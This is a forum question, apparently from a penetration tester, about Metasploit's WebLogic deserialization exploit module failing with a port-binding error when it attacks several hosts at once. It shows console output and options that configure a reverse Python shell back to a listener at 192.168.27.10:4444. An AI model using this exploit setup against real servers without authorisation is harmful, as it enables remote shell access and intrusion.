Metasploit Starts attacking multiple targets, results in “address is already in use”

I am attempting to pentest multiple Weblogic servers, however, when I

“run” or “exploit” or even “exploit -J”,

metasploit begins to attack multiple targets at once, which results in “address is already in use”

msf5 exploit(multi/misc/weblogic_deserialize_unicastref) > run [*] Exploiting target 192.168.27.24 [*] Exploiting target 192.168.27.25 [*] Started reverse TCP handler on 192.168.27.10:4444 [*] Exploiting target 192.168.27.26 [-] Handler failed to bind to 192.168.27.10:4444:-  - [-] Handler failed to bind to 0.0.0.0:4444:-  - [-] 192.168.27.26:7001 - Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444). 

Here are my options

msf5 exploit(multi/misc/weblogic_deserialize_unicastref) > show options  Module options (exploit/multi/misc/weblogic_deserialize_unicastref):  Name     Current Setting                                Required  Description ----     ---------------                                --------  ----------- RHOSTS   file:/tmp/msf-db-rhosts-20190415-21066-ez3gp8  yes       The target address range or CIDR identifier RPORT    7001                                           yes       The target port (TCP) SRVHOST  0.0.0.0                                        yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT  8080                                           yes       The local port to listen on. SSL      false                                          no        Negotiate SSL for incoming connections SSLCert                                                 no        Path to a custom SSL certificate (default is randomly generated)   Payload options (cmd/unix/reverse_python):  Name   Current Setting  Required  Description ----   ---------------  --------  ----------- LHOST  192.168.27.10    yes       The listen address (an interface may be specified) LPORT  4444             yes       The listen port SHELL  /bin/bash        yes       The system shell to use.   Exploit target:  Id  Name --  ---- 0   Unix 

any ideas what I might be doing wrong?